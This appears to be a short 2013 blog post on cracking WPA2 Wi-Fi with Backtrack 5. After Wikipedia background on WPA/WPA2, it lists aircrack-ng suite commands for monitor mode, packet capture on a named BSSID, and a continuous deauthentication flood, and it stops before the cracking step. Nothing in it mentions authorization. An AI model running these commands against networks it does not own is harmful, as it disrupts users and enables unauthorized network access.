Wednesday, July 24, 2013

How to crack WPA2 with Backtrack 5

     Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy).
WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2. WPA2 became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard. 
    WPA2 has replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it introduces CCMP, a new AES-based encryption mode with strong security.[6] Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark. (source form wikipedia)

In this opportunity, I want share about cracking WPA2 with Backtrack. So, the tools what i need is :
- compotible wifi card
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- wordlist

In the first time, I use airmon-ng to activate monitor mode enabled on mon0. this is the command "airmon-ng start wlan0"

Then use airodump-ng to capture data packets, and generate a results file capture. I use command "airodump-ng mon0" to see MAC of WI-FI. so  The command to dump is "airodump-ng -w secureHotspot --bssid 78:47:1D:BC:2E:FB mon0"


After that, use aireplay-ng to sending deAuth to broadcast MAC. The command "aireplay-ng -0 0 -a 78:47:1D:BC:2E:FB mon0"


And the last step, crack the WPA.